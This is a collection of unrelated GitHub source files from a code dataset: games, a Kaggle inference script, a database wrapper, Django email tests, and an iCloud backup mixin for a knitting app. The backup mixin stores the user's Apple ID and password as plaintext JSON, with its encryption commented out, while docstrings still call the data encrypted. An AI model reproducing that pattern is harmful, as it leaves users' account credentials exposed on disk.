slider_color[1]/2, slider_color[2]/2),\n (slider_x, self.slider_y+self.slider_height/2),\n (slider_x+self.slider_width, self.slider_y+self.slider_height/2))\n pygame.draw.rect(self.window, slider_color, pygame.Rect(slider_x, self.slider_y + self.slider_values[slider_i]*(self.slider_height-self.slider_knob_height), self.slider_width, self.slider_knob_height))\n \n slider_x = self.slider_x + self.slider_width/2 + (self.slider_width + self.slider_spacing) * (slider_i-self.slider_offset) - self.slider_numbers[slider_i].get_width()/2\n self.window.blit(self.slider_numbers[slider_i], (slider_x, self.slider_y + self.slider_height + 5))\n\n # draw texts\n self.window.blit(self.text_reset_slider, (self.width-200, 20))\n self.window.blit(self.text_randomize_slider, (self.width-200, 40))\n self.window.blit(self.text_save_skin, (self.width-200, 60))\n self.window.blit(self.text_load_skin, (self.width-200, 80))\n self.window.blit(self.text_converge, (self.width-200, 100))\n self.window.blit(self.text_move_sliders, (self.width-200, 120))\n self.window.blit(self.text_toggle_overlay, (self.width-200, 140))\n self.window.blit(self.text_sharpen, (self.width-200, self.sharpen_slider_y-22))\n self.window.blit(self.text_sharpen_value, (self.width-200, self.sharpen_slider_y+20))\n self.window.blit(self.text_reduce_colors, (self.width-200, self.number_colors_slider_y-22))\n self.window.blit(self.text_number_of_colors, (self.width-200, self.number_colors_slider_y+20))\n self.window.blit(self.text_slider_range, (self.width-200, self.slider_range_y-22))\n\n if self.mouse_over_slider_i != None or self.mouse_pressed_slider_i 
!= None:\n self.window.blit(self.text_slider_description, (10, 360))\n\n # draw number of colors slider\n pygame.draw.line(self.window, (255,255,255) if self.reduce_colors else (100,100,100),\n (self.number_colors_slider_x + ((self.number_of_colors_default-self.number_colors_min)/(self.number_colors_max-self.number_colors_min))**0.5 * self.number_colors_slider_width, self.number_colors_slider_y),\n (self.number_colors_slider_x + ((self.number_of_colors_default-self.number_colors_min)/(self.number_colors_max-self.number_colors_min))**0.5 * self.number_colors_slider_width, self.number_colors_slider_y + self.number_colors_slider_height))\n pygame.draw.line(self.window, (255,255,255) if self.reduce_colors else (100,100,100),\n (self.number_colors_slider_x, self.number_colors_slider_y+self.number_colors_slider_height/2),\n (self.number_colors_slider_x+self.number_colors_slider_width, self.number_colors_slider_y+self.number_colors_slider_height/2))\n pygame.draw.rect(self.window, (255,255,255) if self.reduce_colors else (100,100,100), pygame.Rect(self.number_colors_slider_x + ((self.number_of_colors-self.number_colors_min)/(self.number_colors_max-self.number_colors_min))**0.5 *(self.number_colors_slider_width-self.number_colors_slider_knob_width), self.number_colors_slider_y, self.number_colors_slider_knob_width, self.number_colors_slider_height))\n\n # draw sharpen slider\n pygame.draw.line(self.window, (255,255,255) if self.sharpen_skin else (100,100,100),\n (self.sharpen_slider_x + ((self.sharpen_value_default-self.sharpen_min)/(self.sharpen_max-self.sharpen_min))**0.5 * self.sharpen_slider_width, self.sharpen_slider_y),\n (self.sharpen_slider_x + ((self.sharpen_value_default-self.sharpen_min)/(self.sharpen_max-self.sharpen_min))**0.5 * self.sharpen_slider_width, self.sharpen_slider_y + self.sharpen_slider_height))\n pygame.draw.line(self.window, (255,255,255) if self.sharpen_skin else (100,100,100),\n (self.sharpen_slider_x, self.sharpen_slider_y+self.sharpen_slider_height/2),\n (self.sharpen_slider_x+self.sharpen_slider_width, self.sharpen_slider_y+self.sharpen_slider_height/2))\n pygame.draw.rect(self.window, (255,255,255) if self.sharpen_skin else (100,100,100), pygame.Rect(int(self.sharpen_slider_x + ((self.sharpen_value-self.sharpen_min)/(self.sharpen_max-self.sharpen_min))**0.5 * (self.sharpen_slider_width-self.sharpen_slider_knob_width)), self.sharpen_slider_y, self.sharpen_slider_knob_width, self.sharpen_slider_height))\n\n # draw slider range slider\n pygame.draw.line(self.window, (255,255,255),\n (self.slider_range_x + ((self.slider_range_default-self.slider_range_min)/(self.slider_range_max-self.slider_range_min)) * self.slider_range_width, self.slider_range_y),\n (self.slider_range_x + ((self.slider_range_default-self.slider_range_min)/(self.slider_range_max-self.slider_range_min)) * self.slider_range_width, self.slider_range_y + self.slider_range_height))\n pygame.draw.line(self.window, (255,255,255),\n (self.slider_range_x, self.slider_range_y+self.slider_range_height/2),\n (self.slider_range_x+self.slider_range_width, self.slider_range_y+self.slider_range_height/2))\n pygame.draw.rect(self.window, (255,255,255), pygame.Rect(int(self.slider_range_x + ((self.slider_range_factor-self.slider_range_min)/(self.slider_range_max-self.slider_range_min)) * (self.slider_range_width-self.slider_range_knob_width)), self.slider_range_y, self.slider_range_knob_width, self.slider_range_height))\n\n pygame.display.flip()\n self.clock.tick(40)\n\n pygame.quit()\n\n\nif __name__ == 
\"__main__\":\n app = App()\n app.run()\n","repo_name":"BirnB4um/MC_Skin_Generator","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":32422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"5641971588","text":"import tkinter as tk\nimport tkinter.messagebox as msg\nimport sys, random\n\n# 隣接リス��\nadjacent = (\n (1, 4), # 0\n (0, 2, 5), # 1\n (1, 3, 6), # 2\n (2, 7), # 3\n (0, 5, 8), # 4\n (1, 4, 6, 9), # 5\n (2, 5, 7, 10), # 6\n (3, 6, 11), # 7\n (4, 9, 12), # 8\n (5, 8, 10, 13), # 9\n (6, 9, 11, 14), # 10\n (7, 10, 15), # 11\n (8, 13), # 12\n (9, 12, 14), # 13\n (10, 13, 15), # 14\n (11, 14) # 15\n)\n\n# 駒の色\npiece_color = (\n None,\n 'deep sky blue', \n 'sky blue',\n 'light sky blue',\n 'gold2',\n 'deep pink',\n 'hot pink', \n 'pink', \n 'gold3',\n 'sea green',\n 'medium sea green',\n 'light sea green',\n 'gold4',\n 'dark salmon', \n 'salmon', \n 'light salmon'\n)\n\n# メインウィンドウ\nroot = tk.Tk()\nroot.title('15 Puzzle')\n\n# グローバル変数\nlevel = tk.IntVar() # Easy = 0, Normal = 1, Hard = 2\nlevel.set(0)\nbuff = tk.StringVar() # ラベルのバッファ\nbuff.set(\"\")\n\nmoves = 0 # 手数\ngameflag = False # ゲーム中ならば True\n\nmin_moves = [999, 999, 999]\nshuffle_count = [25, 50, 75]\n\n# 手数表示用ラベル\nla = tk.Label(textvariable = buff, font = ('', 14))\nla.pack()\n\n# 盤面を表示するためのキャンバス\nc0 = tk.Canvas(root, width = 220, height = 220, bg = 'brown4')\nc0.create_rectangle(9, 9, 210, 210, fill = 'black')\nc0.pack()\n\n# 盤面\nboard = [ 1, 2, 3, 4,\n 5, 6, 7, 8,\n 9, 10, 11, 12,\n 13, 14, 15, 0]\n\n# 駒\npiece = [None]\n\n# 手数の表示\ndef show_moves(m):\n buff.set('手数: {:3d} 記録: {:3d} '.format(m, min_moves[level.get()]))\n\n# 空き場所を探す\ndef search_space(z):\n for s in adjacent[z]:\n if board[s] == 0: return s\n\n# 駒の移動\ndef move_piece(n):\n global moves, gameflag\n if not gameflag: return\n z = board.index(n)\n x = z % 4\n y = z // 4\n s = search_space(z)\n if s is not None:\n x1 = s % 4\n y1 = s // 4\n board[s] = n\n board[z] = 0\n c0.coords(piece[n], x1 * 50 + 35, y1 * 50 + 35)\n moves += 1\n show_moves(moves)\n if board == [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,0]:\n msg.showinfo(message = 'おめでとうございます')\n if min_moves[level.get()] > moves:\n min_moves[level.get()] = moves\n show_moves(moves)\n gameflag = False\n\n# ゲームの開始\ndef start_game():\n global moves, gameflag\n move = [0]\n moves = 0\n gameflag = True\n show_moves(moves)\n for i in range(15):\n board[i] = i + 1\n board[15] = 0\n s = 15\n c = 0\n while c < shuffle_count[level.get()]:\n d = random.choice(adjacent[s])\n p = board[d]\n if p == move[-1]: continue\n board[s] = p\n board[d] = 0\n move.append(p)\n s = d\n c += 1\n for i in range(0, 16):\n if board[i] == 0: continue\n x = i % 4\n y = i // 4\n c0.coords(piece[board[i]], x * 50 + 35, y * 50 + 35)\n\n#\n# 盤面\n#\n\n# コールバック関数を生成する\ndef make_callback(n):\n return lambda _: move_piece(n)\n\n# 駒の生成\nfor i in range(1, 16):\n x = (i - 1) % 4\n y = (i - 1) // 4\n la = tk.Label(root, text = '{}'.format(i), bg = piece_color[i], fg = 'white', font = ('', 24))\n la.bind('', make_callback(i))\n id = c0.create_window(x * 50 + 35, y * 50 + 35, window = la, width = 48, height = 48)\n piece.append(id)\n\n#\nshow_moves(0)\n\n#\n# メニューバー\n#\nmenubar = tk.Menu(root)\nroot.configure(menu = menubar)\n\ngames = tk.Menu(menubar, tearoff = False)\nlevels = tk.Menu(menubar, tearoff = False)\nmenubar.add_cascade(label=\"Games\", underline = 0, menu=games)\nmenubar.add_cascade(label=\"Level\", underline = 0, menu=levels)\n\n# Games\ngames.add_command(label = 
\"Start\", underline = 0, command = start_game)\ngames.add_separator\ngames.add_command(label = \"exit\", underline = 0, command = sys.exit)\n\n# Labels\nlevels.add_radiobutton(label = 'Easy', variable = level, value = 0, command = start_game)\nlevels.add_radiobutton(label = 'Normal', variable = level, value = 1, command = start_game)\nlevels.add_radiobutton(label = 'Hard', variable = level, value = 2, command = start_game)\n\nroot.mainloop()\n","repo_name":"uminekohouse/15pazzle","sub_path":"tmp1.py","file_name":"tmp1.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15437203165","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport config\n\nimport os\nimport subprocess\nimport time\nimport pathlib\nimport pixelit\n\nclass AppLoop:\n def __init__(self):\n self.applist=[]\n\n def loadApps(self):\n currentpath=pathlib.Path(__file__).parent.resolve()\n #print(\"[DEBUG]\",str(currentpath))\n for file in os.listdir(str(currentpath)+\"/active-apps\"):\n if not file.endswith(\"config.py\"):\n if not file.endswith(\"pixelit.py\"):\n if file.endswith(\".py\"):\n #print(file)\n tmp=App(file,str(currentpath)+\"/active-apps/\"+file)\n self.add(tmp)\n\n def getApplist(self):\n return self.applist\n\n def printApps(self):\n print(\"[INFO] SERVER found\",len(self.applist),\"apps:\")\n for i in self.applist:\n print(\"[INFO] SERVER\", i.getAppname(),\": in\",i.getPath())\n\n def add(self, newApp):\n self.applist.append(newApp)\n\nclass App:\n def __init__(self,appname,path):\n self.appname=appname\n self.path=path\n\n def getAppname(self):\n return (self.appname)\n \n def getPath(self):\n return (self.path)\n \ndef text(mytext):\n print(\"\\n===========================\")\n print(mytext)\n print(\"===========================\\n\")\n\nif __name__ == \"__main__\":\n\n text(\"WELCOME TO PIXELIT SERVER\")\n\n appLoop=AppLoop()\n appLoop.loadApps()\n print(\"[INFO] SERVER found these apps:\")\n appLoop.printApps()\n\n text(\"SERVER Apploop starts now!\")\n \n while True:\n for i in appLoop.getApplist():\n subprocess.call(i.getPath()) #calling individual .py scripts\n print(\"\\n Advancing to next app \\n\")\n\n","repo_name":"dassystem/pixelit-server","sub_path":"pixelit-server.py","file_name":"pixelit-server.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9882476828","text":"\nn = int(input())\nfor i in range(n):\n t = map(int, input().split(' '))\n x = list(t)\n \n counter = 0\n for j in range(x[0],x[1]):\n is_prime = True\n for k in range(2,j):\n if j%k == 0:\n is_prime = False \n if(is_prime):\n counter+=1 \n print(counter) ","repo_name":"dimiksonkha/problem-solving","sub_path":"easy_problems/prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"34392126691","text":"import os\nimport joblib\nimport pandas as pd\n\nfrom data import load_data, transform\nfrom utils import seed_everything\nfrom env import *\nimport time\n\nif __name__ == \"__main__\":\n seed_everything(42)\n model = joblib.load(\"checkpoints/day4/cv_0.79796.pkl\")\n\n start = time.time()\n\n X, _ = load_data(\n X_path=os.path.join(BASE_DIR, \"data/test.parquet\"),\n y_path=None,\n )\n X, _ = transform(X, None)\n # X = X.to_pandas()\n print(f\"[{time.time() - start}] load data 
complete\")\n\n start = time.time()\n y_pred = model.predict(X)\n print(f\"[{time.time() - start}] predict complete\")\n print(y_pred.shape)\n\n start = time.time()\n submission = pd.read_csv(os.path.join(BASE_DIR, \"data/sample_submission.csv\"))\n submission[\"cust_ID\"] = (\n submission[\"customer_ID\"].apply(lambda x: int(x[-16:], 16)).astype(\"int64\")\n )\n submission[[\"customer_ID\", \"cust_ID\"]].merge(\n pd.DataFrame(y_pred, columns=[\"prediction\"], index=X.index),\n left_on=\"cust_ID\",\n right_index=True,\n how=\"left\",\n )[[\"customer_ID\", \"prediction\"]].to_csv(\"submission.csv\", index=False)\n print(f\"[{time.time() - start}] submission complete\")","repo_name":"DevKor-Team/American-Express-Default-Prediction","sub_path":"onground/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"17407197855","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 10 10:25:50 2022\n\n@author: jpbakken\n\"\"\"\nfrom mixins.layout import EditFieldDialog\nfrom mixins.layout import iCloudCredentialsDialog\n\nimport json\n\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDFlatButton\n\nfrom pyicloud import PyiCloudService\nimport threading\nimport os\n\n# =============================================================================\n# icloud drive functions\n# =============================================================================\n\n\nclass Backups():\n icloud = None\n icloud_action = None\n\n\n def project_backup(self):\n '''\n authenticate and process backup in a thread\n --go through 2factor authenticate if needed\n '''\n self.icloud_action = 'backup'\n self.icloud_thread_start(self.icloud_auth)\n \n # if an untrusted session is returned, go through 2f auth\n if self.icloud:\n if not self.icloud.is_trusted_session:\n self.dialog_icloud_auth()\n\n\n def project_del_local_backup(self,):\n '''\n keep only number of backups specified in config settings\n '''\n files = os.listdir(self.wk_project_backup_dir)\n backups = []\n for f in files:\n if f.split('.')[-1] == 'zip':\n backups.append(f)\n \n \n backups.sort(reverse=True)\n \n for idx, backup in enumerate(backups):\n if idx >= int(self.backups_local):\n os.remove(os.path.join(self.wk_project_backup_dir,\n backup))\n\n\n def project_del_icloud_backup(self):\n '''\n keep only number of backups specified in config settings\n '''\n files = self.icloud.drive[self.app_name][self.wk_project_name].dir()\n backups = []\n for f in files:\n if f.split('.')[-1] == 'zip':\n backups.append(f)\n \n backups.sort(reverse=True)\n \n for idx, backup in enumerate(backups):\n if idx >= int(self.backups_icloud):\n self.icloud.drive[self.app_name]\\\n [self.wk_project_name][backup].delete()\n\n\n def icloud_thread_start(self,target):\n '''\n '''\n self.icloud_thread = threading.Thread(target=target)\n self.icloud_thread.start()\n self.icloud_thread.join()\n\n\n def icloud_read(self):\n '''\n '''\n cookie_directory = os.path.join(self.data_dir,'_cookies') \n\n # create/refresh the connection to icloud\n self.icloud = PyiCloudService(self.apple_id,\n self.apple_password,\n cookie_directory=cookie_directory,\n )\n \n def icloud_auth(self):\n '''\n start icloud service with username and password\n \n return to do 2 factor authentication if session is untrusted\n \n if authenticated, process the icloud action\n '''\n \n self.icloud_read()\n \n # not trusted, break the thread and 
go through auth code steps\n        if not self.icloud.is_trusted_session:\n            return\n\n        # create the app folder if needed\n        if self.app_name not in self.icloud.drive.dir():\n            self.icloud.drive.mkdir(self.app_name)\n            self.icloud_read()\n\n        # process the icloud action\n        else:\n            if self.icloud_action == 'backup':\n                self.icloud_backup()\n\n\n    def dialog_icloud_auth(self):\n        '''\n        popup dialog used to enter the authorization code\n        '''\n        self.edit_field_name = 'Authentication Code'\n        self.edit_field_text = ''\n\n        self.icloud_auth_dialog = MDDialog(\n            title='Enter Code',\n            type=\"custom\",\n            pos_hint = {'center_x': .5, 'top': .9},\n            content_cls=EditFieldDialog(),\n            buttons=[\n                MDFlatButton(\n                    text=\"Cancel\",\n                    on_release=self.dialog_icloud_auth_dismiss),\n                MDFlatButton(\n                    text=\"Save\",\n                    on_release=self.dialog_icloud_2f)])\n\n        self.icloud_auth_dialog.open()\n\n\n    def dialog_icloud_login(self):\n        '''\n        popup dialog used to save username and password\n        '''\n        self.edit_field_name = 'iCloud Authentication'\n        self.edit_field_text = ''\n\n        self.icloud_login_dialog = MDDialog(\n            title='Log in with your Apple Id and password',\n            type=\"custom\",\n            pos_hint = {'center_x': .5, 'top': .9},\n            content_cls=iCloudCredentialsDialog(),\n            buttons=[\n                MDFlatButton(\n                    text=\"Cancel\",\n                    on_release=self.dialog_icloud_login_dismiss),\n                MDFlatButton(\n                    text=\"Save\",\n                    on_release=self.dialog_icloud_login_save)])\n\n        self.icloud_login_dialog.open()\n\n\n    def dialog_icloud_auth_dismiss(self, inst):\n        '''\n        dismiss the dialog\n        '''\n        self.icloud_auth_dialog.dismiss()\n\n\n    def dialog_icloud_login_dismiss(self, inst):\n        '''\n        dismiss the dialog\n        '''\n        self.icloud_login_dialog.dismiss()\n\n\n    def dialog_icloud_login_save(self, inst):\n        '''\n        save the login details; note that the Fernet encryption in\n        icloud_write_encrypted is commented out, so credentials are\n        currently written as plaintext JSON\n        '''\n        self.apple_id = self.icloud_login_dialog.content_cls.ids.apple_id.text\n        self.apple_password = self.icloud_login_dialog.content_cls.ids.apple_password.text\n        self.icloud_write_encrypted()\n\n        self.icloud_login_dialog.dismiss()\n\n        self.icloud_auth()\n\n        if self.icloud:\n            if not self.icloud.is_trusted_session:\n                self.dialog_icloud_auth()\n\n\n    def icloud_write_encrypted(self):\n        '''\n        write the credentials to disk (plaintext JSON for now; the\n        Fernet-encrypted variant is stubbed out below)\n        '''\n\n        data = {\"apple_id\":self.apple_id,\n                \"apple_password\": self.apple_password}\n\n        # data_bytes = json.dumps(data).encode('utf-8')\n        # encrypted = self.fernet.encrypt(data_bytes)\n        # with open(self.encrypted_filepath, 'wb') as f:\n        #     f.write(encrypted)\n\n        with open(self.encrypted_filepath, 'w') as f:\n            json.dump(data, f)\n\n    def icloud_read_encrypted(self):\n        '''\n        read the credentials from disk, creating an empty credentials\n        file on first run\n        '''\n        if not os.path.exists(self.encrypted_filepath):\n            self.apple_id = ''\n            self.apple_password = ''\n            self.icloud_write_encrypted()\n\n        with open(self.encrypted_filepath, 'r') as f:\n            data_dict = json.load(f)\n\n        # with open(self.encrypted_filepath, 'rb') as f:\n        #     data = f.read()\n        # decrypted = self.fernet.decrypt(data)\n        # data_dict = json.loads(decrypted.decode('utf8'))\n\n        self.apple_id = data_dict['apple_id']\n        self.apple_password = data_dict['apple_password']\n\n\n    def dialog_icloud_2f(self, inst):\n        '''\n        use input from the dialog to do two-factor authentication\n        '''\n        self.api_code = self.icloud_auth_dialog.content_cls.ids.edit_field.text\n\n        result = self.icloud.validate_2fa_code(self.api_code)\n\n        if not result:\n            self.dialog()\n\n        elif not self.icloud.is_trusted_session:\n            self.dialog(\n                text=\"Session is not trusted. Requesting trust...\")\n            result = self.icloud.trust_session()\n\n            if not result:\n                self.dialog(\n                    text=\"Failed to request trust. 
You will likely be prompted for the code again in the coming weeks\")\n\n elif self.icloud_action == 'backup':\n \n self.dialog(title='Authenticated' ,\n text='Proceeding with backup')\n \n\n self.dialog_icloud_auth_dismiss(inst)\n \n # try the backup again once authenticated\n if self.icloud_action == 'backup':\n self.project_backup() \n \n \n def icloud_backup(self):\n '''\n ''' \n self.zip_project()\n \n app_dir = self.icloud.drive[self.app_name]\n \n if not self.wk_project_name in app_dir.dir():\n app_dir.mkdir(self.wk_project_name)\n self.icloud_read()\n app_dir = self.icloud.drive[self.app_name]\n\n project_dir = app_dir[self.wk_project_name]\n \n file = self.zip_filename\n \n with open(file, 'rb') as f:\n project_dir.upload(f)\n \n os.rename(self.zip_filename,self.backup_path)\n\n self.project_del_local_backup()\n self.project_del_icloud_backup()\n\n\n def icloud_download(self, file):\n '''\n '''\n","repo_name":"jpbakken/KnitApp","sub_path":"App/mixins/backups.py","file_name":"backups.py","file_ext":"py","file_size_in_byte":8938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29299854636","text":"import turtle\n\nt = turtle.Turtle()\nscreen = turtle.Screen()\nscreen.setup(width=800, height=500)\nscreen.bgcolor('black')\nscreen.tracer(False)\n\n\n\ndef slonce():\n t.penup() \n t.goto(300, 130)\n t.fillcolor(\"yellow\")\n t.pendown()\n t.begin_fill()\n t.circle(50)\n t.end_fill()\n\ndef pien():\n t.penup() \n t.goto(-155, -200)\n t.pendown()\n t.color(\"brown\")\n t.begin_fill()\n t.forward(50)\n t.right(90)\n t.forward(400)\n t.right(90)\n t.forward(50)\n t.right(90)\n t.forward(400)\n t.end_fill()\n\ndef korona_drzewa():\n t.penup() \n t.goto(-180, -50)\n t.pendown()\n t.backward(100)\n t.left(90)\n t.color('green')\n t.begin_fill()\n t.circle(80)\n t.end_fill()\n\n\ndef trawa():\n t.home()\n t.backward(400)\n t.right(90)\n t.forward(300)\n t.begin_fill()\n t.color('lightgreen')\n t.left(90)\n t.forward(800)\n t.left(90)\n t.forward(100)\n t.left(90)\n t.forward(800)\n t.end_fill()\n\ndef domek():\n t.penup() \n t.goto(50, 0)\n t.pendown()\n t.begin_fill()\n t.color('#e6e6e6')\n t.forward(200) \n t.right(90)\n t.forward(200)\n t.right(90)\n t.forward(200)\n t.right(90)\n t.forward(200)\n t.end_fill()\n\ndef dach():\n t.penup() \n t.goto(50,0)\n t.pendown()\n t.begin_fill()\n t.color('red')\n t.forward(200)\n t.left(120)\n t.forward(200)\n t.left(120)\n t.forward(200)\n t.left(120)\n t.end_fill()\n \ndef okno1():\n t.penup() \n t.goto(210,-95)\n t.pendown()\n t.begin_fill()\n t.color('yellow')\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.end_fill()\n\ndef okno2():\n t.penup() \n t.goto(135,-95)\n t.pendown()\n t.begin_fill()\n t.color('yellow')\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.end_fill()\n\ndef drzwi():\n t.penup() \n t.goto(172.5,-200)\n t.pendown()\n t.begin_fill()\n t.color('orange')\n t.forward(60)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(60)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.end_fill()\n\nslonce()\ntrawa()\npien()\nkorona_drzewa()\ndach()\ndomek()\nokno1()\nokno2()\ndrzwi()\n\n\n\nscreen.update()\nscreen.exitonclick()\n\n","repo_name":"MateuszKi/podsgrafkomp","sub_path":"LAB1 - Obrazek.py","file_name":"LAB1 - 
Obrazek.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36679409557","text":"\nfrom src.OBJECTS.DATABASE.COLUMN import COLUMN\n\nclass TABLE(object):\n def __init__(self, SCHEMA, name, data, ACTION = [], POST_ACTION = []):\n \"\"\"\n __init__(self, SCHEMA, name, data):\n SCHEMA::src.OBJECTS.SCHEMA.SCHEMA - schema object defined\n ---@ scd/src/OBJECTS/SCHEMA\n name::string\n data::pandas.DataFrame - Filtered data queried from src.CONNECT object\n\n attributes:\n _update::bool - Update flag\n _schema::src.OBJECTS.SCHEMA.SCHEMA\n _name::string - Table name\n _data::pandas.DataFrame - Filtered data queried from src.CONNECT object\n _dir::string - File to map table to.\n read_data::list - list of strings of names of children\n _data::pandas.DataFrame - Filtered data queried from src.CONNECT object\n _children::list - list of src.OBJECT.COLUMN objects\n\n function: Attribute nessesary state to src.OBJECT.TABLE.TABLE\n object, check the existance of such a table in currently stored\n images, and construct src.OBJECTS.TABLE.TABLE objects. Upon comp-\n letion of the construction of src.OBJECT.COLUMN.COLUMN objects, if\n any of those children triggered the _update attribute to trigger, \n We then construct that file and write the contents of the rendered \n template to that file.\n\n returns - self\n \"\"\"\n self.update = False\n self._parent = SCHEMA\n self._name = name\n self._ACTION = ACTION\n self._POST_ACTION = POST_ACTION\n self._actions = {action.__name__ : action(self).O().__act__() for action in ACTION}\n self._data = data; self._children = self.construct_children(); del self._data\n self._post_actions = {action.__name__ : action(self).O().__act__() for action in POST_ACTION}\n\n def __getitem__(self, item):\n \"\"\"\n __getitem__(self, item)\n item::int\n\n function: Afford src.OBJECT.DATABASE.DATABASE itterable\n behaviors for use in loops.\n\n returns - src.OBJECT.SCHEMA.SCHEMA\n \"\"\"\n return self._children[item]\n\n def construct_children(self):\n \"\"\"\n construct_schemas(self)\n\n function: find the unique SCHEMA names in the connected \n DATABASE and instanciate src.OBJECTS.SCHEMA.SCHEMA\n objects for each of those names. 
See src.OBJECTS.\\\n SCHEMA.SCHEMA for further details.\n\n \"\"\"\n unique_children = self._data['COLUMN_NAME'].unique()\n return [\n COLUMN(\n self,\n column,\n self._data[\n self._data['COLUMN_NAME'] == column\n ],\n self._ACTION,\n self._POST_ACTION\n )\n for column in unique_children\n ]\n","repo_name":"OpenJ92/dbm","sub_path":"src/OBJECTS/DATABASE/TABLE.py","file_name":"TABLE.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14670714569","text":"from datetime import UTC, date, datetime, timedelta\nfrom unittest.mock import MagicMock, patch\n\nfrom django.test import RequestFactory, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom emails.actions import instructor_training_approaching_receiver\nfrom emails.models import EmailTemplate, ScheduledEmail\nfrom emails.signals import (\n INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n instructor_training_approaching_signal,\n)\nfrom workshops.models import Event, Organization, Person, Role, Tag, Task\nfrom workshops.tests.base import TestBase\n\n\nclass TestInstructorTrainingApproachingReceiver(TestCase):\n def setUp(self) -> None:\n self.template = EmailTemplate.objects.create(\n name=\"Test Email Template\",\n signal=INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n from_header=\"workshops@carpentries.org\",\n cc_header=[\"team@carpentries.org\"],\n bcc_header=[],\n subject=\"Greetings\",\n body=\"Hello! Nice to meet **you**.\",\n )\n ttt_organization = Organization.objects.create(\n domain=\"carpentries.org\", fullname=\"Instructor Training\"\n )\n self.event = Event.objects.create(\n slug=\"test-event\",\n host=Organization.objects.create(domain=\"example.com\", fullname=\"Example\"),\n administrator=ttt_organization,\n start=date.today() + timedelta(days=30),\n )\n ttt_tag = Tag.objects.create(name=\"TTT\")\n self.event.tags.add(ttt_tag)\n instructor_role = Role.objects.create(name=\"instructor\")\n self.instructor1 = Person.objects.create(\n personal=\"Test\", family=\"Test\", email=\"test1@example.org\", username=\"test1\"\n )\n self.instructor2 = Person.objects.create(\n personal=\"Test\", family=\"Test\", email=\"test2@example.org\", username=\"test2\"\n )\n Task.objects.create(\n event=self.event, person=self.instructor1, role=instructor_role\n )\n Task.objects.create(\n event=self.event, person=self.instructor2, role=instructor_role\n )\n\n @patch(\"emails.actions.base_action.logger\")\n def test_disabled_when_no_feature_flag(self, mock_logger) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n with self.settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", False)]}):\n # Act\n instructor_training_approaching_receiver(None, request=request)\n # Assert\n mock_logger.debug.assert_called_once_with(\n \"EMAIL_MODULE feature flag not set, skipping \"\n \"instructor_training_approaching\"\n )\n\n def test_receiver_connected_to_signal(self) -> None:\n # Arrange\n original_receivers = instructor_training_approaching_signal.receivers[:]\n\n # Act\n # attempt to connect the receiver\n instructor_training_approaching_signal.connect(\n instructor_training_approaching_receiver\n )\n new_receivers = instructor_training_approaching_signal.receivers[:]\n\n # Assert\n # the same receiver list means this receiver has already been connected\n self.assertEqual(original_receivers, new_receivers)\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n def test_action_triggered(self) -> None:\n # Arrange\n 
request = RequestFactory().get(\"/\")\n\n # Act\n with patch(\n \"emails.actions.base_action.messages_action_scheduled\"\n ) as mock_messages_action_scheduled:\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n scheduled_email = ScheduledEmail.objects.get(template=self.template)\n mock_messages_action_scheduled.assert_called_once_with(\n request,\n INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n scheduled_email,\n )\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n @patch(\"emails.actions.base_action.messages_action_scheduled\")\n @patch(\"emails.actions.instructor_training_approaching.one_month_before\")\n def test_email_scheduled(\n self,\n mock_one_month_before: MagicMock,\n mock_messages_action_scheduled: MagicMock,\n ) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n signal = INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME\n context = {\n \"event\": self.event,\n \"instructors\": [self.instructor1, self.instructor2],\n }\n scheduled_at = datetime(2023, 8, 5, 12, 0, tzinfo=UTC)\n mock_one_month_before.return_value = scheduled_at\n\n # Act\n with patch(\n \"emails.actions.base_action.EmailController.schedule_email\"\n ) as mock_schedule_email:\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n mock_schedule_email.assert_called_once_with(\n signal=signal,\n context=context,\n scheduled_at=scheduled_at,\n to_header=[self.instructor1.email, self.instructor2.email],\n generic_relation_obj=self.event,\n author=None,\n )\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n 